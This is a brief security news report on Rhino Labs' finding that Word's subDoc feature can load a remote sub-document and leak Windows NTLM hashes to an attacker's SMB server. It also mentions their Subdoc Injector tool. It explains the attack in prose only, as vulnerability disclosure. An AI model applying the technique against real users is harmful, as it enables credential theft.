Security researchers from Rhino Labs (a US-based cyber-security firm) have found that cyber criminals can use a Microsoft Word feature dubbed subDoc to fool Windows machines into handing over their NTLM hashes, which is the usual format in which user account credentials are saved.
subDoc feature was created to load a document into the body of a different document, so as to include data from one document into the other, while also enabling for the data to be updated and seen on its own.
Rhino’s researchers said that the feature can be used to load external (Internet-hosted) subDoc files into the host document, thus enabling for malicious exploitation in specific conditions.
To exploit this vulnerability, the researchers said that attackers can place together a Word file that loads a sub-document from a malicious server. Cyber criminals can use a malicious SMB server at the other edge of this request, and instead of sending the requested sub-document, they fool the user’s computer into handing over the NTLM hash required for authentication on a fake domain.
The researchers have released an open source tool on GitHub called Subdoc Injector that is intended to create a Word subDoc for a user-defined URL and also to combine it into a user-specified ‘parent’ Word doc.